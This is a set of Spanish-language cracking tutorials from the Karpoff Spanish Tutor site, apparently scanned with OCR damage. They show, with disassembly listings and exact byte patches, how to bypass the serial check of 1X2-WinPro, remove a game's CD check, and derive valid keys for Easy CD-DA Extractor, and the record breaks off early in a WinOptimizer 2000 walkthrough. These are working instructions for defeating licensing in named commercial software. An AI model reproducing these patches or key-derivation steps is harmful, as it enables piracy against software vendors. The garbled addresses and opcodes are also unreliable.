Al + KOMANDO + PARRA + - Albrto - Th3_Crow- Snaper - Vébon - etc.. 


[ E+0+F] 


E2001 :: RuL :: rulzgzGtreleline. es 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Programa: 


Karpoff Spanish Tutor 


1X2-WinPro 3.2.0 Profesional 


PROTECCION: Serial. 

Objetivo: Obtención del serial, o simular estar registrados. 

Descripcion: Para hacer quinielas 

Dificultad: Muy facil. 

DOWNLOAD : http:// [lo siento no me acuerdo] 

Herramientas: Softice 3.xx, W32dasm. 

CRACKER: kamui FECHA: 5/4/2001 
INTRODUCCION 


Hey, hola otra vez, vengo a presentarles otro programa para ver k sistema de protección tiene ( bastante malo la verdad ). Es un 
programa para hacer las quinielas de fútbol (a lo k llega la desesperación de ser rico....). 

Es uno de los programas actuales y además dicen k da buenos resultados, todavía no lo he probao, pero seguro k lo hago.... 

La direccion de donde me la bajé, pues no me acuerdo pero en cualquier buscador yo creo que lo encontrareis facilmente. 

Bien comenzamos el atake. 


AL ATAKE 


Bueno a simple vista sabemos k el objetivo está hecho en Visual Basic ( debido a los archivos k copia ).Bien como siempre lo vamos a 
desensamblar mediante el W32Dasm para VB, podría hacerse tambien con el Smartcheck pero, eso es otro tutorial..... 


Al desensamblar, vemos: 


:005E0382 F7DF neg edi 
:005E0384 1BFF sbb edi, edi 
:005E0386 47 inc edi 
:005E0387 F7DF neg edi 


* Reference To: MSVBVMG60.__ vbaFreeStr, Ord:0000h 


| 
:005E0389 FF1550134000 Call dword ptr [00401350] 


:005E038F 8D4DB8 lea ecx, dword ptr [ebp-48] 


* Reference To: MSVBVM60.__vbaFreeObj, Ord:0000h 


| 
:005E0392 FF154C134000 Call dword ptr [0040134C]Aki el Chekeo,, ¿serial introducido=serial bueno? 
:005E0398 6685FF test di, di==>flag=0=>comparación ERRONEA 


:005E039B 0F84A8000000 je 005E0449==>Salta si la comparación es Erronea=> serial no correcto! 
:005E03A1 8B55D8 mov edx, dword ptr [ebp-28] 
:005E03A4 52 push edx 


* Possible StringData Ref from Code Obj ->"Final" 


| 
:005E03AS5 6814474500 push 00454714 


* Possible StringData Ref from Code Obj ->"SAPIDLL" 


| 
:005EO3AA 6850874500 push 00458750 


* Possible StringData Ref from Code Obj ->"API Seccion" 


| 
:005E03AF 6834874500 push 00458734 


* Reference To: MSVBVM60.rtcSaveSetting, Ord:02B2h 


:005E03B4 FF1508104000 Call dword ptr [00401008] 

:005E03BA B904000280 mov ecx, 80020004 

:005E03BF B80A000000 mov eax, 0000000A 

:005E03C4 894D80 mov dword ptr [ebp-80], ecx 

:005E03C7 894D90 mov dword ptr [ebp-70], ecx 

:005E03CA 894DA0 mov dword ptr [ebp-60], ecx 

:005E03CD 8D9538FFFFFF lea edx, dword ptr [ebp+FFFFFF38] 

:005E03D3 8D4DAS lea ecx, dword ptr [ebp-58] 

:005E03D6 C605D066610000 mov byte ptr [006166D0], 00 

:005E03DD 898578FFEEFE mov dword ptr [ebp+FFFFFF78], eax 

:005E03E3 894588 mov dword ptr [ebp-78], eax 

:005E03E6 894598 mov dword ptr [ebp-68], eax 

:005E03E9 C78540FFFFFF40A74500 mov dword ptr [ebp+FFEFFF40], 00454740 
:005E03F3 C78538FFFFFFO8000000 mov dword ptr [ebp+FFFFFF38], 00000008 


* Reference To: MSVBVM60.__vbaVarDup, Ord:0000h 
| 

:005E03FD FF15D4124000 Call dword ptr [004012D4] 
:005E0403 8D8578FEFFFF lea eax, dword ptr [ebp+FEFEFF78] 
:005E0409 8D4D88 lea ecx, dword ptr [ebp-78] 
:005E040C 50 push eax 

:005E040D 8D5598 lea edx, dword ptr [ebp-68] 
:005E0410 51 push ecx 

:005E0411 52 push edx 

:005E0412 8D45A8 lea eax, dword ptr [ebp-58] 
:005E0415 6A00 push 00000000 

:005E0417 50 push eax 


* Reference To: MSVBVM60.rteMsgBox, Ord:0253h 


| 

:005E0418 FF15C0104000 Call dword ptr [004010C0] 
:005E041E 8D8D78FFFFFE lea ecx, dword ptr [ebp+FFFFFF78] 
:005E0424 8D5588 lea edx, dword ptr [ebp-78] 

:005E0427 51 push ecx 

:005E0428 8D4598 lea eax, dword ptr [ebp-68] 

:005E042B 52 push edx 

:005E042C 8D4DAS lea ecx, dword ptr [ebp-58] 

:005E042F 50 push eax 

:005E0430 51 push ecx 

:005E0431 6A04 push 00000004 

:005E0433 FEDÉ call esi 

:005E0435 83C414 add esp, 00000014 

:005E0438 C745E4FEFFFFFE mov [ebp-1C], FFFFFFFF 
:005E043F 684E055E00 push 005E054E 

:005E0444 E9E0000000 ¡mp 005E0529==>Nos envia lejos del mensaje de ERROR! 


* Referenced by a (U)nconditional or (Cjonditional Jump at Address: 

|:005E039B(C) 

| 

:005E0449 B904000280 mov ecx, 80020004**-Si el salto se ha producido,el serial es incorrecto, caemos aki no pasamos por el salto 
anterior, y nos envia directamente al mensaje de error!-** 

:005E044E B80A000000 mov eax, 0000000A 


:005E0453 894D80 mov dword ptr [ebp-80], ecx 

:005E0456 894D90 mov dword ptr [ebp-70], ecx 

:005E0459 894DA0 mov dword ptr [ebp-60], ecx 

:005E045C 8D9538FFFFFF lea edx, dword ptr [ebp+FFFFFF38] 

:005E0462 8D4DAS lea ecx, dword ptr [ebp-58] 

:005E0465 898578 FFFEFF mov dword ptr [ebp+FFFFFF78], eax 

:005E046B 894588 mov dword ptr [ebp-78], eax 

:005E046E 894598 mov dword ptr [ebp-68], eax//Mensaje k no queremos k aparezca , jeje:// 


* Possible StringData Ref from Code Obj ->"Numero de registro NO valido" 


| 
:005E0471 C78540FFFFFF7CA74500 mov dword ptr [ebp+-FFFFEF40], 0045A77C 


:005E047B C78538FFFFFFOS000000 mov dword ptr [ebp+FFFFEFF38], 00000008 


* Reference To: MSVBVM60.__vbaVarDup, Ord:0000h 


| 
:005E0485 FF15D4124000 Call dword ptr [004012D4] 


:005E048B 8D9578FFFFFF lea edx, dword ptr [ebp+FFFFFF78] 
:005E0491 8D4588 lea eax, dword ptr [ebp-78] 


Conclusion: 


Trás ver el listado muerto con el W32DASM para VisualBasic, podemos ver el mensaje de error por la dirección 5E0471,, mirando hacia 
arriba podemos ver algo muy interesante: 


:005E0392 FF154C134000 Call dword ptr [0040134C] 
:005E0398 6685FF test di, di 
:005E039B 0F34A8000000 je 005E0449 


Donde en la call se hace el chekeo compara y si todo va bien no salta.[Se comprueba con el Soft-ICE] , mas adelante podemos ver k si este 
salto no se produce, hay un salto incondicional k nos lleva lejos de la parte del código donde nos da el mensaje de error: 


:005E0444 E9E0000000 ¡mp 005E0529 
Hey la cosa está clara podemos nopear el salto de la dirección 5E0398 para k no nos conduzca al error nunca. 


Vemos una cosa, al parchearlo, jod... solo sirve para una vez cuando lo instalamos de nuevo debemos parchearlo otra vez y tal y tal....., 


pues aki nada el programador ha cometido un fallo muy grande, ya k al parchearlo, y aceptar cualquier serial, vamos otra vez la 


pestaña de registro y..., leches!! (con perdón) un serial correcto!!! ;- ) 


Nota:Esto es para el estudio de la protección del programa, y solo eso , si os gusta o acabais el periodo de evaluación debereis pagar 


para seguirlo usando. 


Un saludo a todos los de Tutoriales-2000, al canal Hcrackers del irc-hispano, bueno y a todos en GENERAL.. 


Para consultas: kamui_ Olatinmail.com/o tambien/kamui__ hotmail.com 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 


PROTECCIÓN: CD-check 
Objetivo: Eliminar el CD-check 
[Descripción: | Muy buen juego de estrategia en tiempo real 


* HexWorkShop 


* SoftICE 4.x * CodeFusion 
3.0 


INTRODUCCIÓN 


Bueno este es mi primer tutorial y mi primer crack y he elegido este programa por que 
tiene una rutina muy fácil tanto de encontrar como de cargarse. De Todas formas para 
cualquier duda podéis mandarme un e-mail 


Herramientas: 


AL ATAKE 


Bueno, bueno, bueno el juego tiene una estúpida forma de mirar a ver si esta el CD en la unidad. Lo que hace es un par de 
comparaciones y si las comparaciones no le cuadran entonces nos hace aparecer un mensajito de esos de Windows diciendo que 
introduzcamos el CD. Bueno pues veamos una forma de lo mas sencilla para saltarnos el mensajito. 


Bueno el mensaje es un claro MessageBox de Windows y su breakpoint correspondiente es "Bpx MessageBoxA". 
Colocamos el breakpoint y ejecutamos el juego y cuando nos salga el mensaje nuestro fiel Soft-ice saltara... 


En fin pensemos un poco ¿que es lo que hace aparecer el mensajito? Premio!!!! una comprobación y un salto condicional, y ¿Donde 
estará ese salto? Pues simple; unas líneas mas arriba de la llamada al mensaje. 


Así pues buscando unas líneas mas arriba observaremos........ 
:00526B3E E817A5EDFF CALL 0040105A 


:00526B43 6880027503 PUSH 03750280 


:00526B48 687CE25500 PUSH 0055E27C 


:00526B4D E852ABEDFF CALL 00401644 <=====----- Comprueba que hay CD. 


:00526B52 83C408 ADD ESP, 08 

:00526B55 85C0 TEST EAX, EAX 

:00526B57 7409 JZ 00526B62 — <o=====------ Salta si no hay CD 
:00526B59 E802B8EDFF CALL 0040230 <====------ Comprueba el CD 
:00526B5E 85C0 TEST EAX, EAX 

:00526B60 754F JNZ  00526BB1  <=====----- Salta si es correcto 


:00526B90 FF15AC879300 [USER32!MessageBoxA] <-----Mensaje de Error 


Incluso para un novato como yo esta claro, la primera call comprueba que haya algún CD y sino hay ninguno salta y nos jode la 
marrana. 


La segunda con el permiso de la primera comprueba el CD y sino es el correcto pues te jodes y pagas 6900 pelas por este juego (las 
vale). 


Pues sabiendo esto y utilizando eso que tienes sobre los hombros pues deduces: 


Si hago que el primer salto no salte nunca no me jodera la marrana. Y si hago que el segundo salte siempre pues podré jugar hasta 
hartarme. 


¿Qué como haces eso? Muy simple... 


El primer salto lo cambias por un par de nop's así el ordenador no hace nada y el segundo lo cambias para que en vez de condicional 
sea incondicional Así que coges un editor hexadecimal y haces los cambios pero no sin antes hacer una copia de seguridad... 


0125F57: 74 09 ------- > 90 90 
0125F60: 75 4F ------- > EB 4F 


Y ya para finalizar coges un generador de cracks (CodeFusion) y tomas como original la copia de seguridad y como crackeado el que 
has modificado y creas un bonito crack. 


Y eso es todo verdad que ha sido fácil..... 


Para cualquier duda podéis mandarme un e-mail 


Karpoff Spanish Tutor: Pagina dedicada a la dibulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Programa: 


PROTECCION: 
Objetivo: 
Descripcion: 
Dificultad: 
DOWNLOAD : 
Herramientas: 


CRACKER: 


Karpoff Spanish Tutor 


EASY CD-DA EXTRACTOR 4.3.0 


Serial Number. 

Pues buscar un Serial válido a la vez que aprendemos algo de criptografía. 
Programa de conversión de CD's de audio a archivos de sonido variados. 
Principiante. 

http://www.poikosoft.com/cdda/ 

Softice 3.24, papel y algo para escribir. 

Arkanian FECHA: 28/03/2001 


INTRODUCCION 


Un nuevo ensayo ( y van ...) en el que vamos a ver como se intenta esconder las cosas, el Serial en este caso, 
sin conseguirlo. De paso veremos algunas técnicas y algunos trucos que nos servirán en el futuro para 
programas de similares características. 


Parece mentira, es el enésimo programa que me encuentro con copyright del año 2000 que funciona como si 
nosotros no existieramos (¿?). Mi opinión es que les da igual mientras haya alguién que pase por caja. 


Bueno, esto no es del todo cierto, el programa parece estar ¿empakado - compilado? con algo que 
FileinsPEctor 4.2-SP1 (aupa Viper) no llega a reconocer y las caracteristicas de las secciones están 
modificadas, pero como vamos a atacar la encriptación del Serial esto no tiene demasiada importancia. 


Eso si, papel y algo para escribir van a ser herramientas fundamentales para este programa. 


Engrasa las neuronas que empezamos... 


AL ATAKE 


PREPARATIVOS 


Al ejecutar el programa observamos que el inicio del mismo tarda lo suyo, esperamos pacientemente y por fin nos 
parece una Ventana de Registro (mira más abajo), con dos partes diferenciadas. Una que nos informa que tenemos un 
Periodo de Evaluación de 20 usos con su botón de ¡Probar! y otra de desbloqueo donde se nos va a pedir una Clave 
y una Clave de comprobación, vemos también que el botón Desbloquear está deshabilitado. 


Vamos a poner 1212121212 como Clave y 1234567890 como Clave de comprobación a ver que pasa... nada, el 
botón sigue deshabilitado. ¿El número de caracteres?, ponemos más caracteres y... nada. ¿Ponemos cualquier cosa?... 
nada que hacer. 


Pensemos un poco, si el botón sigue deshabilitado se puede deber a varias razones. Veamos, en otros programas basta 
con rellenar los campos para que se active el botón, es una comprobación de que el campo está ocupado, una vez que 
se pulsa el botón es cuando se realiza las comprobaciones o lo que sea. 


Este no parece ser el caso, por lo tanto cuando introducimos las Claves el programa tiene que estar haciendo algo. Y 
ese "algo" es alguna otra comprobación, o bien del número de caracteres o bien, y esperemos que sea así, la 
comprobación entera del Serial. El procedimiento puede ser el siguiente: 


-. El usuario introduce las Claves. 

-. Se comprueba lo que sea. 

-. ¿Acierto?, se habilita el botón Desbloquear. 

-. ¿Error?, el programa entra en un bucle esperando una nueva acción del usuario, esta acción puede ser 
o introducir una Clave nueva o darle al botón de ¡Probar!. 


Probaremos un pequeño truco que suele funcionar con programas de estas características. Un ejemplo del esquema 
anterior es el acceso a la zona VIP de los CD's de la revista Primera Linea que se salta también así. 


Metemos de Clave 1212121212 y de Clave de comprobación 123456789, saltamos con Crtl+D a Softlce y hacemos 
lo siguiente: 


S 30:0 LFFFFFFFFFF "1212121212" -> Buscamos... 

Pattern found at 0030:80520A52 (80520A52) -> Respuesta de Softlce. 

BPR 30:80520A52 30:80520A52+A RW -> El lazo de la trampa. 

S -> Por si acaso... 

Pattern found at 0030:COF5B17F (C0F5B17F) -> El eco de la busqueda anterior. 


Una vez puesta la trampa volvemos con Crtl+D al programa y metemos el último digito de nuestro Serial de prueba en 
la Clave de comprobación, en este caso el 0, el resultado es inmediato, adivina donde aterrizamos, ...pues si, 
Kernel!HMEMCPY. 


Atención, en esta fase un bp directo tal como BPX HMEMCPY ¡no funciona!, compruebalo si quieres. 

EL CÓDIGO 

No tiene mucho misterio, sólamente es necesario invertir tres saltos para que el programa quede totalmente registrado, 
uno durante la comprobación que estamos viendo y que es el que habilita el botón, el segundo cuando se pulsa el botón 
Desbloquear que nos manda a un código identico pero en otra dirección y el tercero cuando se inicia el programa y se 
comprueban en HKEY_CURRENT_USERWSoftwarePoikosoftiEasy CD-DA Extractor 4.3 las claves 109 y 110 


que son el Serial, por si te sirve de ayuda los tres van precedidos de un test al, al. ¡Suerte!. 


Pero como saltar el programa sin más no es nuestro objetivo pasaremos elegantemente por encima de estas 
menudencias, vamos a por el Serial válido que es lo que interesa. 


EL SERIAL 


Si has empezado trazando el código desde el principio habrás comprobado como la cosa parece estar divida en tres 


partes, una donde se comprueba la Clave, su número de caracteres y como la posiciona en distintos sitios de memoria 
(acaba en un JMP), otra parte que hace lo mismo con la Clave de comprobación (acaba también en JMP) y la tercera 
que es la que finaliza en el test al, al y el salto condicional. 


Esta es la parte que vamos a analizar. ¿Qué donde coño está escondido el Serial?. Atentos que empieza a asomar las 


orejas: 


:00461A0C push ebp 

:00461A0D mov ebp, esp 

:00461A0F mov eax, [ebp+08] -> Dirección de la Clave de comprobación. 

:00461A12 mov dl, [eax+08] -> El valor del noveno caracter [39]. 

:00461A15 mov al, [eax+09] -> El valor del décimo caracter [30]. 

:00461A18 xor dl, AA -> Los "'xorea'' con AA y 

:00461A1B xor al, AA -> el resultado es 93 y 9A respectivamente. 

:00461A1D movsx ecx, al -> Con esto lo convierte a FFFFFF9A (ver recuadro). 
:00461A20 movsx edx, dl -> Nos queda FFFFFF93, estos valores serán usados más tarde. 
:00461A23 mov eax, ecx -> Lo traslada a EAX. 

:00461A25 push eax -> Guarda el registro. 

:00461A26 push edx -> Idem. 

:00461A27 mov eax, [ebp+0C] -> Dirección de la Clave. 

:00461A2A push eax -> La guarda para luego. 

:00461A2B call 004617A8 -> Entraremos aquí. 

:00461A30 add esp, OC -> Corrige la pila. 

:00461A33 mov eax, 00592A 14 -> La dirección donde se ha creado la Clave de comprobación válida. 
:00461A38 pop ebp -> Recupera ebp y 

:00461A39 ret -> nos vamos. 


No creo que hagan falta muchas más explicaciones, ha cogido los valores noveno y décimo de nuestra Clave de 
comprobación los ha "xoreado" con AA y convertido mediante MOVSX para guardarlos y utilizarlos luego, lo único 
peliagudo es la instrucción MOVSX cuya explicación técnica es la siguiente: 


MOVSX / MOVZX : Carga con extensión de signo o cero. Toma el segundo operando, le extiende 
adecuadamente el signo (o le pone a cero la parte alta) hasta que sea tan grande como el primer operando. Si 
el primer operando es de 16 bits, el segundo sólo puede ser de 8; si el primero es de 32 bits el segundo puede 
ser de 8 ó 16. El primer operando debe ser un registro, el segundo puede ser un registro u operando en 
memoria (nunca inmediato). 


Si no lo entiendes, no te preocupes, hay que darle tiempo al tiempo, no nacemos aprendidos. Creeme cuando te digo 
que se convierten en esos valores. 


Entramos en el call 004617A8 a ver que hay y nos encontramos con un motón de llamadas, subllamadas y saltos atrás, 
donde se comprueba de nuevo la longitud de la Clave y se localizan unas posiciones de memoria (00592A 14 entre 
otras más) hasta que después de un rato localizamos este más que interesante fragmento de código: 


:00461708 push ebp 

:00461709 mov ebp, esp 

:0046170B push ebx 

:0046170C xor eax, eax -> Limpia EAX. 

:0046170E mov ecx, [ebp+08] -> Primer valor de nuestra Clave, [31]. 

:00461711 mov edx, 0056CF58 -> ¡Aquí! 

:00461716 mov ebx, ecx -> Nuestro valor a EBX. 

:00461718 xor bl, AA -> Lo "xorea" con AA. 

:0046171B cmp bl, [edx] -> Lo compara con el valor de EDX. 

:0046171D jz 00461726 -> ¿Son igules?, entonces saltamos, si no son entonces... 
:0046171F inc eax -> Incrementa el contador en EAX. 

:00461720 inc edx -> Siguiente valor de EDX 

:00461721 cmp eax, 1E -> Contador del número de vueltas comprobando los valores de EDX. 
:00461724 jl 00461716 -> Salta hacia arriba. 

:00461726 cmp eax, 1E -> Contador del número de caracteres de la Clave válida. 
:00461729 jnz 00461733 -> Salta hacia la primera parte del algoritmo de transformación. 
:0046172B mov eax, 00000013 -> Un valor fijo indicativo de ¡ERROR!. 

:00461730 pop ebx 

:00461731 pop ebp 

:00461732 ret -> Vuelve a la segunda transformación. 


A ver si consigo explicar de una manera comprensible lo que realmente hace el código de arriba. Coge el primer valor 
de nuestra Clave, traslada a EDX una dirección fija donde hay una serie de valores (nada inteligible en la columna 
ASCID, "xorea" nuestro valor con AA y lo compara con el valor de EDX. Aquí tenemos dos casos: 


1.- Los valores coinciden 


Si alguna comparación es buena saltaremos en jz 00461726 hacia la segunda comparación de EAX con 
1E, como EAX no ha alcanzado todavía ese valor saltaremos a la dirección 00461733 donde se realiza 
una primera y larga transformación de nuestro valor "xoreado". (Es una pasada poner todo el código). 


Acto seguido entramos en una segunda y muchísimo más larga manipulación donde los resultados 
obtenidos de esta primera transformación son sumados, restados, multiplicados, divididos, "xor-ados", 
"ror-ados", "shl-ados", "neg- ados”...etc, con todos los registros, con una multitud de valores fijos y que 
se yo cuantas cosas más. Es bonito ver como cambian todos los registros haciendo una traza automática 


(T 40, por ejemplo). 


En un momento dado, hacia la mitad o así, aparecen los dos valores de antes (FFFFFF93 y FFFFFF9A) 
que son incorporados a esta orgía matemática. Imposible seguirle la pista a todo esto. (Si poner el código 
de la primerá manipulación es una pasada, imagínate esta...) 


2.- Los valores no coinciden 


Si en esta primera comparación no son iguales, aumenta EAX que hace de contador, pero atención a 
esto, EAX hace de contador del número de comparaciones con los valores de EDX. Es decir nuestro 
primer valor "xoreado" va a ser comparado con 30 valores diferentes en EDX. Como nuestro valor 
"xoreado" no sea igual a ninguno de esos valores, que no lo es, EAX llegará a 30 (1E), alcanzaremos la 
segunda comparación con 1E, no saltaremos en 00461729, entonces moverá un valor fijo (0x13h) a 
EAX y date por jodido. 


El ret final nos manda directamente a la segunda transformación donde ese 13 va a ser el valor de inicio 
y pasaremos bastante rato desgastando la tecla F8 para nada, |:-(. 


Y esto sólo con el primer valor de nuestra Clave, la cosa se repite con los otro nueve... paciencia. 
mov edx, 0056CF58 


Parece que nuestro valor se compara con "algo" que hay en esa dirección, veamos que es. Este es un ejemplo de los 
valores que encontramos en EDX: 


FA 98 F0 9E FD 9C E6 9D F9 ES ...hasta 30 valores. 


Si "xorea" nuestro valor con AA y luego lo compara con lo anterior, lógicamente el "xoreo" de estos valores con AA 
nos dará los caracteres válidos de Clave buena, así pues con la ayuda de la calculadora del Windows obtenemos estos 
valores ASCII originales: 


50 32 5A 34 57 36 4C 37 53 42 ...etc. 
Que puestos de una manera legible son: 

P....2...L...4..W...6...L...7...9...B ...etC. 
Hay que tener en cuenta que la posición de estos valores no es estática, lo que hemos visto hasta ahora nos indica que 
la Clave debe tener 30 caracteres de longitud, que necesariamente debe de estar compuesta de los 30 valores anteriores 


y que por lo visto no importa el orden. El código anterior está comprobando si existe ese valor dentro de nuestra 
Clave, no la posición que ocupa. 


Eso nos hace suponer que a ordenaciones diferentes de esos valores tendremos Claves de comprobación diferentes. 
¡Elemental mi querido Watson...! 


Así pues el número de Claves válidas admitidas será el número de Permutaciones de 30, que es igual al factorial de 30. 
(Para los legos, la manera en la que pueden ser ordenados de forma diferente 30 valores). 


En notación matemática el factorial de 30 es, 30! = 30*29*28*....*3*2*1, a mi me sale un número de ¡33 digitos!. 
¿Tantos usuarios esperan tener?, ¿No se han pasado un poco?... Bueno con esto se aseguran que no van a dar la misma 
Clave a dos usuarios diferentes, :-). 


Dejemos de los Grandes Números y vayamos a lo que interesa, tenemos ya una Clave (P2Z4W6L7SB...etc), ¿Qué 
pasa con la Clave de comprobación? 


LA CLAVE DE COMPROBACIÓN 


Hemos puesto la Clave buena (una de ellas) y saltado a Softlce de nuevo. Como ya sabíamos lo que nos espera hemos 
puesto los bp's pertinentes en los sitios adecuados. Estamos aquí, después de toda la orgía matemática y tenemos todos 
los registros ocupados con valores extraños: 


:00461947 mov eax, edi -> El valor de EDI a EAX. 

:00461949 and eax, OOOOFFFF -> Le hace un Y lógico y 
:0046194E push eax -> lo guarda para 

:0046194F call 00461788 -> entrar aquí donde se desencripta. 
:00461954 pop ecx 

:00461955 mov [00592A 14], al -> El primer caracter de la Clave de Comprobación. 
:0046195A sar edi, 02 -> Nueva operación 

:0046195D push edi -> Lo guarda. 

:0046195E call 00461788 -> Lo desencripta. 

:00461963 pop ecx 

:00461964 mov [00592A15], al -> El segundo caracter. 


El código se repite más o menos igual tomando los valores de los diferentes registros, los manipula y entra en el call 
00461788 para desencriptarlos, el resultado lo traslada a la dirección 00592A 14, 00592A 15, 00592A16, etc... Una 
dirección que ya habiamos visto antes. ¿Como los desencripta?, de la siguiente manera: 


:00461788 push ebp 

:00461789 mov ebp, esp 

:0046178B xor edx, edx -> Limpia EDX. 

:0046178D mov ecx, [ebp+08] -> El valor correspondiente 
:00461790 mov eax, ecx -> aEAX. 

:00461792 mov ecx, OO00001E -> ¡Joder con el dichoso 1E!. 
:00461797 div ecx -> Divide EAX, el resto va a EDX. 
:00461799 mov ecx, edx -> El resto a ECX. 

:0046179B mov al, [ecx+0056CF58] -> Seleciona el valor correspondiente de la Tabla de antes. 
:004617A1 xor al, AA ->¡Alehop!, vuelta a su estado original. 
:004617A3 pop ebp 

:004617A4 ret 


Por lo visto los valores de la Clave de comprobación también vienen definidos por las valores existentes en la 
dirección 0OS6CFES58. Esto lo hace con los ocho primeros caracteres, ¿Ocho?, ¿Cuantos son?. 


Sencillo si sigues el código veras que la instrucción mov [00592A1X], al, se repite con las direcciones que van desde 
00592A 14 hasta 00592A1D, una sencilla resta nos dará el número de caracteres de la Clave de comprobación. 
(0059NAIE - 00592A 14 = A; diez caracteres). 


Ocho, ¿y el resto?, pues un poco más abajo encontramos esto: 


:004619DD mov cl, [ebp+0C] -> Nuestro noveno caracter ''xoreado", ¿te acuerdas?, era [93]. 
:004619E0 push ecx 
:004619E1 call 0046175C -> Comparaciones y ''xoreo'' con AA. 


:004619E5 mov [00592A1C], al -> A su sitio. 
:004619EA mov al, [ebp+10] -> El décimo, [9A], con el que hace lo mismo. 


Abreviando porque esto ya se esta haciendo pesado. Coge nuestro noveno y décimo caracter "xoreado", nos metemos 
en el call 0046175C que tiene un código identico al de las dos cmp eax, 1E y hace de nuevo todo el proceso con la 
Tabla de 0OS6CFS58. Si los encuentra, los vuelve a su estado original con otro xor AA y los planta en su sitio, 
00592A1C y 00592A 1D. 


En resumidas cuentas los dos últimos caracteres también deben estar dentro de la Tabla famosa. Y todo esto lo vemos 
comodamente haciendo un DEX 3 592A 14 y dandole caña al F10. 


Seguidamente vienen las rutinas de comparación con nuestra Clave de comprobación de prueba, etc, etc. 
RESUMEN HASTA AHORA 


La Clave se compone de 30 caracteres que se encuentran "ocultos" en la dirección 0OS6CF58, para volverlos a sus 
valores originales basta "xorearlos" con AA. 


La Clave de comprobación se compone de 10 caracteres. Ocho de los cuales son el resultado de la manipulación de 
los 30 caracteres de la Clave junto con los dos caracteres restantes de esta Clave de Comprobación. Los dos últimos 
son dos caracteres cualquiera que formen parte de la Clave. 


Esta Clave de comprobación se encuentra en la dirección 00592A 14. 


Tanto rollo, resumido en media docena de lineas, para habilitar un puto botón. Este es el resultado: 


Easy CD-DA Extractor 


Easy CD-DA Extractor es SHAREWARE, lo que significa que puedes 
probar el software antes de comprarlo. Si te gusta el software y quieres 
seguir usándolo, por favor cómpralo. 


Periodo de Evaluación: 17 Usos 


LORENA 
Comprar Easy CD-DA Extractor ¡Probarl | 
TDesbloquear 


Los usuarios Registrados deben renombrar su código de registro a: 
http: 44. polkosoft comtcdda*download. html 
Clave: 

Aquí vas a encontrar lo que yo te diga, 


Clave de comprobación: 
Página del Easy CD-DA Extractor 51 quieres peces, mojate el culo... 


Hemos empezado con un Periodo de Evaluación de 20 usos y hemos conseguido desbloquear el programa en tres 
intentos. ¡Cada vez lo hacemos mejor!. 


DESBLOQUEAMOS 


Esto ya es por masoquismo, antes de darle al botón hacemos un Crtl+D, limpiamos los bp's y metemos directamente un 
BPX HMEMCPY a ver que pasa. Esta vez si que funciona. 


Saltamos y vemos que el programa vuelve a realizar TODO el proceso, esta vez en una dirección diferente, perdona 
que no la ponga pero no te puedes imaginar el desbarajuste de notas que tengo encima de la mesa, no se donde puñetas 
he metido esta parte. Así que te lo cuento de memoria. 


Una vez comprobado todo de nuevo se crean dos nuevas claves en el Registro de Windows, bajo la rama 
HKEY_CURRENT-_ etc. (la he puesto arriba) de Nombre 109 y 110 cuyos Datos son la Clave y la Clave de 
comprobación. ¡Ya tenemos el programa registrado!. 


Easy CD-DA Extractor 3 


El programa está ahora desbloqueado y totalmente operativo. Gracias por usar 
nuestra software. 


De nada :-))) 


FINALIZANDO 


Solo queda desinstalar el programa y eliminar los datos anteriores del Registro con cualquier utilidad adecuada para 
ello. Yo uso RegCleaner que funciona muy bien y es gratis. 


Como siempre, ruegos y preguntas sobre el tema a: 


arkanian O mailcity.com 


Saludos y hasta otra. 


Karpoff Spanish Tutor: Página dedicada a la divulgación de información en Castellano, sobre 


Ingeniería Inversa y Programación. Email "Colabora con tus Proyectos" 


Programa: 


PROTECCION: 
Objetivo: 
Descripcion: 
Dificultad: 
DOWNLOAD : 
Herramientas: 


CRACKER: 


Karpoff Spanish Tutor 


WINOPTIMIZER 2000 vl1.02. 


Serial Number. 

Buscar un Serial válido, por supuesto. 

Programa para limpiar el Registro, buscar archivos inútiles, etc... 
Principiante. 


http://www.ashampoo.com 


Softice 3.24, papel y algo para escribir. 
Arkanian FECHA: 20/03/2001 


INTRODUCCION 


Un estupendo programa para dejar nuestra máquina limpia de cualquier cosa inútil que haya quedado después 
de instalar (y desinstalar) tropecientos programas de shareware. El programa funciona en 95, 98, ME, NT y 
2000 y viene realmente completo en cuanto a opciones y funciones, es intuitivo, facil de usar, tiene una 
cuidada presentación y un esmerado diseño. Enhorabuena... 


La única pega es, como casi siempre, la seguridad. El programa viene "tal cual”, ni empakado, ni encriptado, 
ni anti-debugger, ni anti-nada, nada de nada, vamos una perita en dulce. Estamos en el siglo XXI ¿verdad?. 


Aprovecharemos la oportunidad que nos brindan los programadores de la casa Ashampoo GmbH Co. KG 
con su "Chief Developer" a la cabeza, cuyo nombre aparece en varios sitios del programa, para echarle un 
vistazo a la forma de obtener un Número de Serie válido para desbloquear las limitaciones de la versión 


Shareware. 


Como curiosidad, la forma en la que se genera y se comprueba el Número de Serie de este programa es 
similar a la que utiliza Softlce para comprobar el suyo durante la instalación. 


AL ATAKE 


INSTALANDO 
Durante la instalación el propio programa nos avisa de las limitaciones del mismo: 


-. La opción Select all está desactivada. 

-. Solo se pueden seleccionar tres registros a eliminar. 

-. La version shareware tiene un gigantesco y molestísimo banner publicitario que cambia cada pocos 
segundos. 


Una vez finalizada la instalación, ejecutamos el programa y vamos a Internet / Support « Info y de ahí seleccionamos 
la opción Enter Reg / Trial Key. 


Esto requiere una pequeña explicación, consultando la ayuda averiguamos que por lo visto existen dos tipos de Serial, 
un primer tipo que podemos denominar "de prueba" en la que se desbloquean las dos primeras limitaciones pero el 
maldito banner continua en su sitio y un segundo tipo "de Registro Total" que desbloquea totalmente el programa y 
hace desaparecer el jodido banner. Vamos a por el segundo que es el que interesa. 


PRIMERA PRUEBA 


Estamos en la Ventana de Registro, acojona ¿eh?, ¡vaya pedazo de sitio que tenemos para meter el Serial!. Tranquilos, 
no hay que fiarse de las apariencias, es todo pura fachada. Introducimos un Serial de prueba de 10 caracteres, algo que 
sea fácil de buscar luego, como por ejemplo 1212121212, ;-) 


Crtl+D para saltar a Softlce, asignamos las ventanas como siempre (DEX 0 EAX, DEX 1 ES:EDI DEX 2 DS:ESJD) e 
iniciamos la busqueda de nuestro número de prueba mediante: 


S 30:0 LFFFFFFFFFF "1212121212" -> Buscando.... 

